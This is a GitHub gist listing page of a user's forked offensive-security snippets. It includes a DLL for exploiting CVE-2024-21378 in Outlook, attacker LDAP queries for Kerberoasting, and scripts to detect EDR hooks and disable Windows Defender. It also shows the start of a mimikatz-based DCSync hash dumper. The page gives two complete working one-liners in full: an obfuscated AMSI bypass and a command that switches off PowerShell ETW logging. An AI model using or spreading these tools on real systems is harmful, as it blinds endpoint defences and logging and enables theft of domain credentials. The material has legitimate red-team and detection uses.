Skip to content

Instantly share code, notes, and snippets.

View fiercebrute's full-sized avatar

fiercebrute

4 followers · 0 following
View GitHub Profile
@fiercebrute
fiercebrute / test_dll.c
Created April 11, 2024 14:18 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@fiercebrute
fiercebrute / LDAPQueries.md
Created November 14, 2023 18:55 — forked from jsecurity101/LDAPQueries.md
List of known LDAP queries used by attackers

List was compiled by Jonathan Johnson (@jsecurity101) and Carlos Perez (@Carlos_Perez)

Queries are not complete and are meant to be a reference. If you are using them for hunting use a contains within the query language.

  • Kerberoasting
    • (&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
    • (&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))
    • (&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))
  • Attributes with passwords
  • (userpassword=*)
@fiercebrute
fiercebrute / GBC.ps1
Created December 9, 2022 09:14 — forked from LuemmelSec/GBC.ps1
Give Back Control over Windows functions script
$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
function Show-Menu {
Clear-Host
Write-Host "======================================================"
Write-Host "================ Give Back Control ================"
Write-Host "======================================================"
if($elevated -eq $true){
Write-Host "Local Admin: " -ForegroundColor white -NoNewline; Write-Host $elevated -ForegroundColor Green
Write-Host "We have superpowers. Ready to continue."
@fiercebrute
fiercebrute / hookdetector.vba
Created December 1, 2022 12:18 — forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
@fiercebrute
fiercebrute / mount-shared-folders.sh
Created August 20, 2022 15:15 — forked from mgeeky/mount-shared-folders.sh
VMware mount shared folders (taken from Kali)
#!/bin/bash
vmware-hgfsclient | while read folder; do
echo "[i] Mounting ${folder} (/mnt/hgfs/${folder})"
mkdir -p "/mnt/hgfs/${folder}"
umount -f "/mnt/hgfs/${folder}" 2>/dev/null
vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "/mnt/hgfs/${folder}"
done
sleep 2s
@fiercebrute
fiercebrute / defender.ps1
Created May 28, 2022 11:56
# Disable Windows Defender
<#
_ _
__ ____ _ _ __ _ __ (_)_ __ __ _ | |
\ \ /\ / / _` | '__| '_ \| | '_ \ / _` | | |
\ V V / (_| | | | | | | | | | | (_| | |_|
\_/\_/ \__,_|_| |_| |_|_|_| |_|\__, | (_)
|___/
@fiercebrute
fiercebrute / Invoke-DCSync.ps1
Created April 17, 2022 17:34 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
@fiercebrute
fiercebrute / HTTP-server
Created November 6, 2021 13:47
Push files here
#!/usr/env python3
import http.server
import socketserver
import io
import cgi
# Change this to serve on a different port
PORT = 80
class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
@fiercebrute
fiercebrute / AMSI powershell
Created August 23, 2021 16:50
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)
@fiercebrute
fiercebrute / KillETW.ps1
Created July 19, 2021 17:27 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)